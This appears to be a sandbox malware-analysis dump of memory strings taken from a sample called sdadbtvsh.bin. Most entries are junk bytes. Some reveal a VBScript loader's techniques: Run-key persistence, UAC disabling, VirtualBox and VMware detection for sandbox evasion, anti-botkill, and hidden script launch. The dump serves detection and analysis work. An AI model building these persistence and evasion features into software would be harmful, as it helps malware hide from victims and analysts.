Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h)hao |
memstr_d6bad6e1-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: s3tt!ng |
memstr_313da493-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: leh-t"]m |
memstr_739ca6c7-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: stpthso |
memstr_5aa47df9-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g#hao |
memstr_3a7fa0fa-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h+>]y |
memstr_1d22cd0a-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g#xbo |
memstr_469dcfc3-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szy] |
memstr_83f1576d-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auex*^t |
memstr_8e7ecb4f-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exec8^f |
memstr_6726a6b5-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h/b^, |
memstr_1d5a3fd7-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m'a^/ |
memstr_7cb3e771-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6j^4 |
memstr_c1f2985f-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6yh$o |
memstr_19d47174-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: eh#o |
memstr_20e766f4-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @ax$o |
memstr_0fbbbf1d-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exec//_i |
memstr_3b8edabb-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h.$_b |
memstr_d5a05f94-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6(x#o |
memstr_39822b86-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3!m_+ |
memstr_fc8eb4e0-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \*.*x#o |
memstr_a6faf1f3-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exe_ct |
memstr_f4dbe14e-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m.9xg |
memstr_248af7d0-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 646xp |
memstr_2f46ac43-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 25xs |
memstr_5fcd210c-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: e($o |
memstr_ac25c2cc-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @#lx* |
memstr_48738718-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \*.*qx? |
memstr_a6eea226-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szo |
memstr_07d9be22-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_sz |
memstr_2dbd3589-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auex*yt |
memstr_b09a04f9-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbldr |
memstr_5dbaa3ab-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6zoy) |
memstr_be270eca-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3udy" |
memstr_366993c8-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6npy> |
memstr_02afe547-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: gtjy4 |
memstr_923897fd-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dir3ctory_path |
memstr_0210a800-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: program manager |
memstr_403109b7-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: comspec |
memstr_1b9da727-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: read_uac |
memstr_09092b70-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vboxservice.exe&zo |
memstr_d68d4b90-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run |
memstr_3a315f3f-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runhz |
memstr_071cd9ea-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runwz0 |
memstr_0a40273a-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptdirrz |
memstr_6e6f90be-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbsloaderset |
memstr_2c1a5e53-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: key_vbsloader |
memstr_fc9fc995-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vmcessexists0[} |
memstr_fdd64b68-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auexin |
memstr_a1f3b784-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbox.exeistsz[# |
memstr_6cb5726e-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\runa[ |
memstr_4def25f1-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: taskname |
memstr_a6c5a93c-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: meomrypersistance |
memstr_b39088a7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run |
memstr_1f202d76-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: disableuac |
memstr_882897c1-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbsloaderset't` |
memstr_00cbb45f-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: d:\espacefree |
memstr_df89d330-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: d:\espacefreeit |
memstr_a7b4af61-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptdirtt1 |
memstr_8c641f57-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runst |
memstr_a9254601-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system |
memstr_b846eb1c-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: anti_sandbox_vm |
memstr_8b4a7425-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vboxtray.exe |
memstr_61fe1ce7-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: script |
memstr_38de9fc1-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: anti_botkill*us |
memstr_22580a70-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupkey1u~ |
memstr_d3c41a2f-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup1 |
memstr_0030079e-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shortx |
memstr_5a2ef1c9-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exe_c?w |
memstr_8d957dfa-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @eewo |
memstr_fba3a10c-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: /trxwb |
memstr_bc1d0dc6-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 0skhcmrwx |
memstr_ca687d2d-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: "tw^ |
memstr_df616826-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: le6xt |
memstr_47f41377-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auex |
memstr_6b1ab3a2-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ware' |
memstr_c815319e-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: sw_hide |
memstr_eb1acfe9-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auexsp |
memstr_91e64536-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: execup |
memstr_991ea283-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szdpn |
memstr_dc766901-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @$wp] |
memstr_536cbe91-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: da3m. |
memstr_7eb8d369-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6y@qj |
memstr_8a10d363-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: gxsqy |
memstr_028c3de2-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szt |
memstr_77b06294-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_sz2r |
memstr_3d96ecca-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: le6qt |
memstr_65140e00-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6~ero |
memstr_f5b81a22-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ni_set |
memstr_67451a9b-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run9s |
memstr_011407a7-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\users\user\wrse\nngqrvwq.xl |
memstr_2617ed09-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3us |
memstr_d8e58357-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3 |
memstr_a1a5668e-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume37 |
memstr_9263815f-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3 |
memstr_7922f5b3-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: .\device\harddiskvolume3| |
memstr_9288a04d-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enableluatware\microso |
memstr_f02350a7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_dword |
memstr_2dde727e-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vmwareuser.exe/ |
memstr_74b289a0-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_pathchine\soft& |
memstr_7a072fee-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder9 |
memstr_2486c7aa-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settings0 |
memstr_07ec74cd-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup2 |
memstr_0b9e660e-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: settingsfn |
memstr_7b72133b-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupkey |
memstr_d5b7d2f4-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_foldere /sc mi |
memstr_a359fa7d-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: update.vbsn |
memstr_93feacee-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_patha |
memstr_36881846-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: settingsfnx |
memstr_7d66eb9e-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folders |
memstr_91d2641c-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dir3ctory_pathej |
memstr_e44b06b7-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vmwareservice.exem |
memstr_a7490cac-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folderd |
memstr_5f7bbed3-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: update.vbs_ |
memstr_abeff0a7-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settingsv |
memstr_c8452f69-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dir3ctory_pathe |
memstr_4065536c-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start.vbs |
memstr_dbeb4a65-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settings |
memstr_e181be5f-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: windowsrepaire |
memstr_3af8a476-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enablelua |
memstr_b30dc0a8-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start.lnk |
memstr_1f0244ed-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupkeyware\microso |
memstr_7149cfa1-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_path |
memstr_202f3d4b-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: const hidden = 0 |
memstr_4cbd44f1-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder |
memstr_c1b7a60c-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: qsprs |
memstr_706951ab-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @(rt |
memstr_17d95afa-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tam*.b |
memstr_0045b4eb-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @x(rt |
memstr_e3c9094a-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hmhqt |
memstr_91b6f8df-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: crlfl |
memstr_084bb939-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: counter |
memstr_d9895a5d-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start |
memstr_a4c5ec90-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: crlfhpt |
memstr_25846bfc-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ray.exej |
memstr_7a1a2c2e-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3bhlt |
memstr_080fbb02-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: eymxo$ |
memstr_e30697c8-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @6b8mt |
memstr_dace0ed2-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h[8lt |
memstr_cb640584-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: mkhlt |
memstr_4a2950d1-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: msxlt |
memstr_5c206dab-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: script[ |
memstr_ca6bf852-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @x8mt |
memstr_fc039222-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: gxmt |
memstr_dc44330a-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: short |
memstr_608465e7-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptj |
memstr_87c36bb2-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6_hot |
memstr_6045b811-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szx |
memstr_f3804915-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @ehrt |
memstr_5d86d45f-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 8ehmt |
memstr_a07fc1dd-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enm l |
memstr_522d35cd-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ho(st |
memstr_bbd16feb-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptl |
memstr_429507d6-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: file =" |
memstr_69d6a379-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ,hd8ot |
memstr_e29c4028-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ,2j8ot |
memstr_424ba123-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m'hnt |
memstr_6a4f68f0-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3)xot |
memstr_cfaba98e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m?xot |
memstr_b12f2ca1-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: crlfhnt |
memstr_a8c0c16a-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: '6xhot |
memstr_aa82f0d3-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ,88ot |
memstr_5733a420-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: '8hot |
memstr_73896cbc-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shortxpt |
memstr_a94e495b-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enm8e |
memstr_70796865-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6:8pt |
memstr_e89ae687-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auexhn |
memstr_fc3946c3-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3$8qt |
memstr_d32a4f9d-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exe_c |
